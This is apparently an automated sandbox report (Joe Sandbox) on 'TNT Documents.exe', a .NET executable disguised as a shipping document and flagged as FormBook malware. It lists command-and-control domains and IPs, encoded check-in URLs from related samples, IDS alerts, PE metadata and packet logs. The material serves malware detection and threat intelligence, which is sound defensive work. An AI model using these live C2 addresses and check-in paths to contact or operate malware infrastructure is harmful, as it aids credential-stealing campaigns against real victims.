                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.tiro.comicTNT Documents.exe, 00000000.00000003.260092488.000000000548B000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.fontbureau.com/designers/TNT Documents.exe, 00000000.00000003.264583046.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264654507.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264398711.000000000548D000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  http://www.fontbureau.comitudTNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown

                                                                  Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  119.18.54.99
                                                                  		metronixmedical.comIndia
                                                                  		394695PUBLIC-DOMAIN-REGISTRYUStrue
                                                                  34.102.136.180
                                                                  		coached.infoUnited States
                                                                  		15169GOOGLEUSfalse
                                                                  51.255.30.106
                                                                  		cortepuroiberico.comFrance
                                                                  		16276OVHFRtrue
                                                                  209.17.116.163
                                                                  		www.specialtyplastics.onlineUnited States
                                                                  		55002DEFENSE-NETUStrue

                                                                  General Information

                                                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                                                  Analysis ID:532859
                                                                  Start date:02.12.2021
                                                                  Start time:18:56:46
                                                                  Joe Sandbox Product:CloudBasic
                                                                  Overall analysis duration:0h 12m 53s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:light
                                                                  Sample file name:TNT Documents.exe
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                  Number of analysed new started processes analysed:28
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:1
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • HDC enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.evad.winEXE@9/1@10/4
                                                                  EGA Information:Failed
                                                                  HDC Information:
                                                                  • Successful, ratio: 8.7% (good quality ratio 7.7%)
                                                                  • Quality average: 72.4%
                                                                  • Quality standard deviation: 32.8%
                                                                  HCA Information:
                                                                  • Successful, ratio: 96%
                                                                  • Number of executed functions: 0
                                                                  • Number of non-executed functions: 0
                                                                  Cookbook Comments:
                                                                  • Adjust boot time
                                                                  • Enable AMSI
                                                                  • Found application associated with file extension: .exe
                                                                  Warnings:
                                                                  Show All
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                  • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  18:57:58API Interceptor1x Sleep call for process: TNT Documents.exe modified

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  209.17.116.163RFQ - SST#2021111503.exeGet hashmaliciousBrowse
                                                                  • www.edukado.online/teni/?1bSD0d6p=0pqFAulx9peJBQaLHhi2O539GrRUe9Dg5qnQgkcE3vGHf3Q1HjrP1jP/RDvSqSrk2xiP&jJB=9r9x5R
                                                                  yVvATSvedsfMg0l.exeGet hashmaliciousBrowse
                                                                  • www.ichelbrousset.com/czh8/?h0DX=irrd3yuyc1GImfABIedh2a+c4kF1IqLY7IOBv/DJSDLKV1P8G+/4s2D0JrIDDvMvFjLtzXE2ZQ==&UpZ=4hzll
                                                                  DZqb1YCMJknskFE.exeGet hashmaliciousBrowse
                                                                  • www.alvarezdelugo.store/9mj8/?b61TGp=UkZThqrRocv5vk1faiVRq9+iiPL+c1gbqU90ov2hL2y42KpkYKZbBF4nZ16GjYtZO51IIqH2Lg==&2dXl=-Zt00jOpTfntw
                                                                  DHL Documents.exeGet hashmaliciousBrowse
                                                                  • www.specialtyplastics.online/how6/?l2Jl=xCGPRvAkK+xY+IPwAFenqNjQ2EZcc1A/OJpQ1mtXoxRJ135kHr2e9wYqnzra08qQhypJ&Tf5pq=W6zlk8Rp
                                                                  Dhl_AWB5032675620,pdf.exeGet hashmaliciousBrowse
                                                                  • www.durston.store/b62n/?t64PStG=z6Vsvg8A5NXyXPPhKMZIBHml/L7mqqirp/PWrU0BeLpkyNyDM5h+f+EgtIJL2Tixlbzc&Sp=4hX0vf
                                                                  vbc.exeGet hashmaliciousBrowse
                                                                  • www.applebroog.industries/fqiq/?2d=0RH9gkF6jVnFZMBLg5arrRt8ci9oBvnO845D4NtwM1wnd4qumJjOU8GaWcQJQdSDPFjg&KBZh8h=9rFxIRS8frv8A02
                                                                  TT_SWIFT_Export Order_noref S10SMG00318021.exeGet hashmaliciousBrowse
                                                                  • www.aarondecker.online/46uq/?j0=SFN8Rxuh3&3fQ0Khi=IBlQMs5j29CKqlv3/eZQ6Z47udTwmev2IX+bwOiN2E8lumQwhRgtDV6FzU7U1t+cHC/Y
                                                                  Nuevo Pedido.exeGet hashmaliciousBrowse
                                                                  • www.downingmunroe.online/udeh/?2dYxhfjx=XsaaYVs5B+09RIkVBuB9uz7A4nUjKuiPTgX8t5JQ0XDGnKq9QQr8GjRKS5XBt9MDEtTg&s6AD=5jltOBY8-rN
                                                                  Payment Advice.docGet hashmaliciousBrowse
                                                                  • www.nihonkoryu.site/cy88/?JpCxc=UdPBVTbj1CZF+opyLZ3z0qAaJaL/JpkwFii79QX209xtQVaMtZARr5G5+pIvOlE0oIFN3g==&9rl=-Z8xBfo8a6
                                                                  68886.xlsxGet hashmaliciousBrowse
                                                                  • www.viscoent.online/scb0/?bXi=L8pgukv0AuVDNAdjNh2AJGutMHnCfg3bCrFlNw+YyifAdhr3mrIeLuq3PR+hiDkJiRhf3g==&PB=hxoT
                                                                  PO_No.202201EYL-01_ABW.exeGet hashmaliciousBrowse
                                                                  • www.aarondecker.online/46uq/?j6Al=IBlQMs5j29CKqlv3/eZQ6Z47udTwmev2IX+bwOiN2E8lumQwhRgtDV6FzXbE6MukZnWf&4hqTJ=PpNtRPgx0VJ
                                                                  rfq.exeGet hashmaliciousBrowse
                                                                  • www.eloiseball.online/s2qi/?MhBd9XLx=CJ4ega8we8rDK2oOyDtNp6AuRxR37H0DfWv6L4ABKIpafKqiPSieQwyYu/RVEHddVBRA&SR=d0DLMt
                                                                  New Order.xlsxGet hashmaliciousBrowse
                                                                  • www.viscoent.online/scb0/?NN6=L8pgukv0AuVDNAdjNh2AJGutMHnCfg3bCrFlNw+YyifAdhr3mrIeLuq3PR+hiDkJiRhf3g==&lFND1Z=6lPhL
                                                                  PO202104-114 - APQ Comercial Apoquindo,pdf.exeGet hashmaliciousBrowse
                                                                  • www.durston.store/b62n/?ChJte=z6Vsvg8A5NXyXPPhKMZIBHml/L7mqqirp/PWrU0BeLpkyNyDM5h+f+EgtIJhpjSxhZ7c&d6A=SJExlzkP
                                                                  As5zvmxhPo.exeGet hashmaliciousBrowse
                                                                  • www.scbcommunity.partners/xgmi/?SzrxP8lx=ibySZgQScShq1lS4qM2nT1qHIBOXZbGjkidZCxDm/G3nGy75y5MD+ijFjtG1ArxxbKo6&tTbDp=7nf8x
                                                                  SWIFT-MLSB-11,546.docGet hashmaliciousBrowse
                                                                  • www.howellenterprises.biz/cy88/?0deDKH=f2Jd-DLxZJsXUZ&cjXL1rR=fkUWIEJ3aTmqc1Hb/8mQzV6AtAV96QXeCAvCSnvV4vLU/JJ/qpHHTJ9bGgGB5MvhUhf5fg==
                                                                  SHIPMENT ARRIVAL NOTICE - ORIGINAL DOCUMENTS__pdf.exeGet hashmaliciousBrowse
                                                                  • www.gzsz.online/ubw4/?cR-H=RPx2ZUkBCpbabyLVYaiQALpYpcukYHUKRCHGI7PR5DR61tf9OEQgp5XPT5XPjlBrfWaDsOZcvg==&G4=q6PdCh7
                                                                  Quote request.exeGet hashmaliciousBrowse
                                                                  • www.eloiseball.online/s2qi/?lZwxYz=y6AldH-&TJELpfLP=CJ4ega8we8rDK2oOyDtNp6AuRxR37H0DfWv6L4ABKIpafKqiPSieQwyYu/RVEHddVBRA
                                                                  scan_21000076119_pdf.exeGet hashmaliciousBrowse
                                                                  • www.edukado.online/teni/?3fx8BFd=0pqFAulx9peJBQaLHhi2O539GrRUe9Dg5qnQgkcE3vGHf3Q1HjrP1jP/RAPo6DLcsWDI&A6U89=j2JXRdWhjhk8k
                                                                  NEW ORDER 2021.exeGet hashmaliciousBrowse
                                                                  • www.metalworkingadditives.online/b2c0/?N0=tQ9OUq/fzxn+R82X6GTzZlmpGIW84sc0d5YJpv42KDMZxUSBkatd7Ys79Ad1zpKElTcI&o48=QhiPALAplp

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  www.specialtyplastics.onlineDHL Documents.exeGet hashmaliciousBrowse
                                                                  • 209.17.116.163

                                                                  ASN

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  PUBLIC-DOMAIN-REGISTRYUSDhl Document.exeGet hashmaliciousBrowse
                                                                  • 208.91.199.224
                                                                  DHL Waybill receipt.exeGet hashmaliciousBrowse
                                                                  • 208.91.199.223
                                                                  Shipping Document BL Copy.exeGet hashmaliciousBrowse
                                                                  • 103.195.185.115
                                                                  DHL SHIPMENT NOTIFICATION 284748395PD.exeGet hashmaliciousBrowse
                                                                  • 208.91.199.223
                                                                  SHIPPING DOCUMENT & PL.exeGet hashmaliciousBrowse
                                                                  • 103.195.185.115
                                                                  Swift MT103 pdf.exeGet hashmaliciousBrowse
                                                                  • 208.91.199.225
                                                                  Scan096355.exeGet hashmaliciousBrowse
                                                                  • 208.91.199.225
                                                                  yYa94CeATF8h2NA.exeGet hashmaliciousBrowse
                                                                  • 208.91.199.223
                                                                  part-1500645108.xlsbGet hashmaliciousBrowse
                                                                  • 103.76.231.42
                                                                  part-1500645108.xlsbGet hashmaliciousBrowse
                                                                  • 103.76.231.42
                                                                  item-40567503.xlsbGet hashmaliciousBrowse
                                                                  • 162.215.254.201
                                                                  item-40567503.xlsbGet hashmaliciousBrowse
                                                                  • 162.215.254.201
                                                                  PG4636 - Confirmed .xls.exeGet hashmaliciousBrowse
                                                                  • 208.91.198.143
                                                                  item-107262298.xlsbGet hashmaliciousBrowse
                                                                  • 162.215.254.201
                                                                  item-107262298.xlsbGet hashmaliciousBrowse
                                                                  • 162.215.254.201
                                                                  item-1202816963.xlsbGet hashmaliciousBrowse
                                                                  • 162.215.254.201
                                                                  item-1202816963.xlsbGet hashmaliciousBrowse
                                                                  • 162.215.254.201
                                                                  DHL Receipt.htmlGet hashmaliciousBrowse
                                                                  • 199.79.62.126
                                                                  BOQ.exeGet hashmaliciousBrowse
                                                                  • 208.91.199.223
                                                                  RFQ-Spares and tools.exeGet hashmaliciousBrowse
                                                                  • 208.91.198.143
                                                                  OVHFRClaimCopy-1848214335-12022021.xlsbGet hashmaliciousBrowse
                                                                  • 158.69.133.78
                                                                  ClaimCopy-1848214335-12022021.xlsbGet hashmaliciousBrowse
                                                                  • 158.69.133.78
                                                                  ClaimCopy-539408676-12022021.xlsbGet hashmaliciousBrowse
                                                                  • 158.69.133.78
                                                                  ClaimCopy-539408676-12022021.xlsbGet hashmaliciousBrowse
                                                                  • 158.69.133.78
                                                                  ClaimCopy-539408676-12022021.xlsbGet hashmaliciousBrowse
                                                                  • 158.69.133.78
                                                                  reg.exeGet hashmaliciousBrowse
                                                                  • 213.186.33.5
                                                                  REQUEST FOR SPECIFICATION.exeGet hashmaliciousBrowse
                                                                  • 213.251.158.218
                                                                  ETgVKIYRW5.dllGet hashmaliciousBrowse
                                                                  • 149.56.106.83
                                                                  cMVyW1SDZz.dllGet hashmaliciousBrowse
                                                                  • 149.56.106.83
                                                                  ETgVKIYRW5.dllGet hashmaliciousBrowse
                                                                  • 149.56.106.83
                                                                  cMVyW1SDZz.dllGet hashmaliciousBrowse
                                                                  • 149.56.106.83
                                                                  2iJBYBel22.dllGet hashmaliciousBrowse
                                                                  • 149.56.106.83
                                                                  2iJBYBel22.dllGet hashmaliciousBrowse
                                                                  • 149.56.106.83
                                                                  Tender SN980018277 & SN9901827 Signed Copy.exeGet hashmaliciousBrowse
                                                                  • 51.161.104.181
                                                                  Invoice.exeGet hashmaliciousBrowse
                                                                  • 54.38.220.85
                                                                  AegEywmjUJ.exeGet hashmaliciousBrowse
                                                                  • 51.79.99.124
                                                                  P.O SPECIFICATION.xlsxGet hashmaliciousBrowse
                                                                  • 51.79.99.124
                                                                  DC-330NC.xlsxGet hashmaliciousBrowse
                                                                  • 51.79.99.124
                                                                  FILE_915494026923219.xlsmGet hashmaliciousBrowse
                                                                  • 158.69.222.101
                                                                  UioA2E9DBG.dllGet hashmaliciousBrowse
                                                                  • 158.69.222.101

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TNT Documents.exe.log
                                                                  Process:C:\Users\user\Desktop\TNT Documents.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1314
                                                                  Entropy (8bit):5.350128552078965
                                                                  Encrypted:false
                                                                  SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                                  MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                                  SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                                  SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                                  SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                                  Malicious:true
                                                                  Reputation:high, very likely benign file
                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):7.5483150102950916
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  File name:TNT Documents.exe
                                                                  File size:503808
                                                                  MD5:f943d9ee79559042bfff9b4e55270cfa
                                                                  SHA1:7dca5c03f55ab6cbebd6bb3a8203d5c1d7516567
                                                                  SHA256:2c26343342361efe4ada7dd077f832792eb77f184ec9a6c5b8c3a8ad35dd5aaa
                                                                  SHA512:c9d6bffff768eb7ff3853eeec196e21286a7d5be040c1b1dc4882cc106fd61d6d33ce24444eb77452fef33310a8d202a7568a4cf6db9c4e9b824b6d54b91cf09
                                                                  SSDEEP:12288:dIzgxqzpbqi/RAu/jlYQpYRKz7OoDxI7pIHL0i:dew2Zqi/B/Jb+IX9I7pIr0
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.9...............P.................. ........@.. ....................... ............@................................

                                                                  File Icon

                                                                  Icon Hash:00828e8e8686b000

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x47c5be
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                  Time Stamp:0xA539E86C [Sat Nov 3 17:54:52 2057 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:v4.0.30319
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  jmp dword ptr [00402000h]
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x7c56c0x4f.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x7e0000x5ac.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x800000xc.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x7c5500x1c.text
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x20000x7a5c40x7a600False0.809814702503data7.56105630003IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                  .rsrc0x7e0000x5ac0x600False0.421223958333data4.10451869633IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0x800000xc0x200False0.044921875data0.0980041756627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountry
                                                                  RT_VERSION0x7e0900x31cdata
                                                                  RT_MANIFEST0x7e3bc0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                  Imports

                                                                  DLLImport
                                                                  mscoree.dll_CorExeMain

                                                                  Version Infos

                                                                  DescriptionData
                                                                  Translation0x0000 0x04b0
                                                                  LegalCopyrightCopyright 2019
                                                                  Assembly Version1.0.0.0
                                                                  InternalNamekvhWV10.exe
                                                                  FileVersion1.0.0.0
                                                                  CompanyName
                                                                  LegalTrademarks
                                                                  Comments
                                                                  ProductNameConnectFour
                                                                  ProductVersion1.0.0.0
                                                                  FileDescriptionConnectFour
                                                                  OriginalFilenamekvhWV10.exe

                                                                  Network Behavior

                                                                  Snort IDS Alerts

                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                  12/02/21-18:59:22.638450TCP2031453ET TROJAN FormBook CnC Checkin (GET)4979480192.168.2.751.255.30.106
                                                                  12/02/21-18:59:22.638450TCP2031449ET TROJAN FormBook CnC Checkin (GET)4979480192.168.2.751.255.30.106
                                                                  12/02/21-18:59:22.638450TCP2031412ET TROJAN FormBook CnC Checkin (GET)4979480192.168.2.751.255.30.106
                                                                  12/02/21-18:59:43.047578TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982080192.168.2.7119.18.54.99
                                                                  12/02/21-18:59:43.047578TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982080192.168.2.7119.18.54.99
                                                                  12/02/21-18:59:43.047578TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982080192.168.2.7119.18.54.99
                                                                  12/02/21-18:59:48.300111TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982280192.168.2.734.102.136.180
                                                                  12/02/21-18:59:48.300111TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982280192.168.2.734.102.136.180
                                                                  12/02/21-18:59:48.300111TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982280192.168.2.734.102.136.180
                                                                  12/02/21-18:59:48.478607TCP1201ATTACK-RESPONSES 403 Forbidden804982234.102.136.180192.168.2.7
                                                                  12/02/21-18:59:59.432108TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982780192.168.2.7158.69.116.156
                                                                  12/02/21-18:59:59.432108TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982780192.168.2.7158.69.116.156
                                                                  12/02/21-18:59:59.432108TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982780192.168.2.7158.69.116.156

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 2, 2021 18:59:22.612127066 CET4979480192.168.2.751.255.30.106
                                                                  Dec 2, 2021 18:59:22.638113976 CET804979451.255.30.106192.168.2.7
                                                                  Dec 2, 2021 18:59:22.638432980 CET4979480192.168.2.751.255.30.106
                                                                  Dec 2, 2021 18:59:22.638449907 CET4979480192.168.2.751.255.30.106
                                                                  Dec 2, 2021 18:59:22.664401054 CET804979451.255.30.106192.168.2.7
                                                                  Dec 2, 2021 18:59:22.687228918 CET804979451.255.30.106192.168.2.7
                                                                  Dec 2, 2021 18:59:22.687256098 CET804979451.255.30.106192.168.2.7
                                                                  Dec 2, 2021 18:59:22.687608004 CET4979480192.168.2.751.255.30.106
                                                                  Dec 2, 2021 18:59:22.687623978 CET4979480192.168.2.751.255.30.106
                                                                  Dec 2, 2021 18:59:22.715280056 CET804979451.255.30.106192.168.2.7
                                                                  Dec 2, 2021 18:59:27.825119019 CET4981580192.168.2.7209.17.116.163
                                                                  Dec 2, 2021 18:59:30.835841894 CET4981580192.168.2.7209.17.116.163
                                                                  Dec 2, 2021 18:59:36.839976072 CET4981580192.168.2.7209.17.116.163
                                                                  Dec 2, 2021 18:59:36.957561016 CET8049815209.17.116.163192.168.2.7
                                                                  Dec 2, 2021 18:59:36.957724094 CET4981580192.168.2.7209.17.116.163
                                                                  Dec 2, 2021 18:59:36.959983110 CET4981580192.168.2.7209.17.116.163
                                                                  Dec 2, 2021 18:59:37.078370094 CET8049815209.17.116.163192.168.2.7
                                                                  Dec 2, 2021 18:59:37.078394890 CET8049815209.17.116.163192.168.2.7
                                                                  Dec 2, 2021 18:59:37.078526974 CET4981580192.168.2.7209.17.116.163
                                                                  Dec 2, 2021 18:59:37.079992056 CET4981580192.168.2.7209.17.116.163
                                                                  Dec 2, 2021 18:59:37.197520971 CET8049815209.17.116.163192.168.2.7
                                                                  Dec 2, 2021 18:59:42.873569965 CET4982080192.168.2.7119.18.54.99
                                                                  Dec 2, 2021 18:59:43.044531107 CET8049820119.18.54.99192.168.2.7
                                                                  Dec 2, 2021 18:59:43.047132015 CET4982080192.168.2.7119.18.54.99
                                                                  Dec 2, 2021 18:59:43.047578096 CET4982080192.168.2.7119.18.54.99
                                                                  Dec 2, 2021 18:59:43.224122047 CET8049820119.18.54.99192.168.2.7
                                                                  Dec 2, 2021 18:59:43.231224060 CET8049820119.18.54.99192.168.2.7
                                                                  Dec 2, 2021 18:59:43.231247902 CET8049820119.18.54.99192.168.2.7
                                                                  Dec 2, 2021 18:59:43.231529951 CET4982080192.168.2.7119.18.54.99
                                                                  Dec 2, 2021 18:59:43.231673956 CET4982080192.168.2.7119.18.54.99
                                                                  Dec 2, 2021 18:59:43.407816887 CET8049820119.18.54.99192.168.2.7
                                                                  Dec 2, 2021 18:59:48.280668020 CET4982280192.168.2.734.102.136.180
                                                                  Dec 2, 2021 18:59:48.299729109 CET804982234.102.136.180192.168.2.7
                                                                  Dec 2, 2021 18:59:48.299890041 CET4982280192.168.2.734.102.136.180
                                                                  Dec 2, 2021 18:59:48.300111055 CET4982280192.168.2.734.102.136.180
                                                                  Dec 2, 2021 18:59:48.319057941 CET804982234.102.136.180192.168.2.7
                                                                  Dec 2, 2021 18:59:48.478606939 CET804982234.102.136.180192.168.2.7
                                                                  Dec 2, 2021 18:59:48.478634119 CET804982234.102.136.180192.168.2.7
                                                                  Dec 2, 2021 18:59:48.478806019 CET4982280192.168.2.734.102.136.180
